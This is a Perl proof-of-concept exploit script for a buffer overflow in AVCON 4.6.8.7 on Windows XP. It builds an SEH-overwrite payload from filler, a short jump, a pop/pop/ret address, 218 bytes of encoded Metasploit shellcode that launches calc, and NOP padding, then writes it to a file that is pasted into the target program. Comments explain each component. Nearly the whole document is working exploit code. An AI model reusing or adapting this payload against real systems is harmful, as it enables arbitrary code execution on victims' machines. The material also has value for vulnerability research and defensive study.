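#!/usr/bin/perl
# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
#
# Proof-of-concept file generator. The script only assembles one byte
# string (filler, nSEH, SEH, shellcode, padding) and saves it to disk;
# per the author's note the file contents are then pasted into
# AVH323GW.exe by hand. Nothing here opens a socket or runs anything.
use strict;
use warnings;

# Output file. NOTE(review): the original header talked about
# "exploit.txt" while the code wrote "poc.txt"; the code's name is kept.
my $exploit = 'poc.txt';

# 1019 bytes of filler placed in front of the nSEH/SEH pair.
my $junk = "\x41" x 1019;

# Next-SEH slot: short jump over the four-byte handler address that
# follows it (jmp +6), padded with two NOPs.
my $nSEH = "\xeb\x06\x90\x90";

# SEH handler address, packed little-endian; the author labels it a
# pop/pop/ret.
my $SEH = pack('V', 0x200504B4);

# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
# Kept byte-for-byte: any edit here changes what the generator emits.
my $buf =
      "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4"
    . "\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2"
    . "\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29"
    . "\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee"
    . "\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c"
    . "\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6"
    . "\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47"
    . "\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf"
    . "\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99"
    . "\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3"
    . "\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22"
    . "\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3"
    . "\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae"
    . "\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4"
    . "\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b"
    . "\x97\x2d\x30\x18\xa5\xbe\x86\x7b";

# Trailing run of 5000 NOP bytes.
my $padding = "\x90" x 5000;

my $payload = $junk . $nSEH . $SEH . $buf . $padding;

# Three-arg open on a lexical handle (the original used a bareword
# handle with the mode glued into the filename). The ':raw' layer keeps
# every byte as written -- a text-mode handle on Windows would rewrite
# 0x0a as 0x0d 0x0a and silently corrupt the output. All three I/O steps
# are checked, since a truncated file would be a misleading "PoC".
open my $fh, '>:raw', $exploit or die "open $exploit: $!";
print {$fh} $payload           or die "write $exploit: $!";
close $fh                      or die "close $exploit: $!";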